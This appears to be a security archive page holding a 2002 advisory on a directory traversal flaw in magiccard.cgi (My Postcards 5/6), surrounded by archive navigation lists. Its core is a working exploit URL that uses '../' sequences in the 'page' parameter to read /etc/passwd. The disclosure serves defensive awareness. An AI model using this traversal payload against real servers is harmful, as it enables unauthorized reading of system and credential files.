magiccard_vuln.txt

magiccard_vuln.txt: Posted Jun 15, 2002; Authored by Cult; Magiccard.cgi has a directory traversal bug in the page variable that allows any file on the system to be read.; tags | exploit, cgi; SHA-256 | ebeddfd494c8d0021e0b86e2f8493f37740875b8485e7be7afedc4a1cf819632; Download | Favorite | View

magiccard_vuln.txt

My Postcards 5,6 vulnerability // magiccard.cgi
-----------------------------------------------

you can read any file on the server, regardless to the HTTP server 
permissions set.
the file must be readable by the user running the HTTPD server.

https://www.xxxxxx.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd

--
cult
simas@kalnieciai.lt

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

magiccard_vuln.txt

magiccard_vuln.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

magiccard_vuln.txt

Share This

magiccard_vuln.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems